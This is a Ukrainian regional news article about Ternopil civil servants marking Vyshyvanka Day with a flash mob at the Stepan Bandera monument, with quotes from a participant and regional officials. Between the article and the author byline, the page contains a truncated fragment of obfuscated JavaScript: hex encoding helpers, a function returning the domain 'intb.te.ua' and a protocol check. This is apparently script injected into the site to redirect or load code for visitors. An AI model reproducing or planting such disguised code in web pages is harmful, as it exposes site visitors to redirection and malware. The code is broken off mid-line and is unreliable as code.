Ви знаходитесь: Головна / Новини / В Тернополі вишиванка, навіть, на пам’ятнику Степану Бандері
В Тернополі вишиванка, навіть, на пам’ятнику Степану Бандері

В Тернополі вишиванка, навіть, на пам’ятнику Степану Бандері

В Тернополі у вишитому, навіть, пам’ятник Степану Бандері. День вишиванки місцеві держслужбовці відзначили знову колоритно та патріотично. Кажуть, хотіли надихнути й інші міста одягнути завтра вишиванку.

Вишите сонце утворили кілька сотень працівників облдержадміністрації та обласної ради біля пам’ятника Степану Бандері. Вже другий рік поспіль вони відзначають День вишиванки флеш-мобом і хочуть, аби національний український одяг носили не лише раз в рік, а чи не щодня.

ОКСАНА, учасниця акції

«Сьогодні я вдягнула, як і всі свою вишиванку. Її я вишивала сама, трошки довго, півроку, але, все-таки, це була така досить клопітка робота. Цю сорочку я одягаю, не тільки в такий день, як День вишиванки, а й, взагалі, всі релігійні свята ми також одягаємо вишиванку. На державні свята: День незалежності, День прапора, всі державні свята також одягаємо вишиванку. Я вважаю, що це такий елемент національної самобутності».

Оздобили червоно-чорним стягом із вишивкою, навіть,  монумент Степану Бандері та будівлю держустанови.

ВІКТОР ОВЧАРУК, голова обласної ради

«Дуже символічно, що сьогодні ми якраз біля пам’ятника Степану Бандері, під червоно-чорним стягом. Який на сьогоднішній день якраз відображає події, які є в Україні. Червоний – це любов, чорний – це події, які є на Сході, без яких ми могли б на сьогоднішній день обійтися. Тому ми ще раз підкреслюємо нашу позицію, що ми українці, ми сильні, вільні і будемо боротися за свої права».

По всій країні День вишиванки відзначатимуть завтра, в третій четвер травня. Тому, своїм флеш-мобом тернопільські держслужбовці кинули виклик чиновникам з інших міст та областей України.

СТЕПАН БАРНА, голова Тернопільської ОДА

«Наша головна ідея сьогодні, напередодні Дня вишиванки – «інфікувати» органи місцевого самоврядування державної влади всієї країни, що завтра вони всі мають вийти у вишитих сорочках. Бо ми і нині, і завтра будемо у вишитих сорочках. І в такий спосіб ми робимо виклик Кабміну, Верховній Раді України, Адміністрації Президента, хай також виходять у вишиванках. Це мають зробити всі, має зробити Львів, має зробити Донецьк, має зробити Луганськ і Крим. Я впевнений в тому, що ми продемонструємо, що ми єдині, і в нашій культурі, і в нашій вишиванці».

До вишиванка-челеджу закликають долучитися і всіх тернополян та жителів області.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top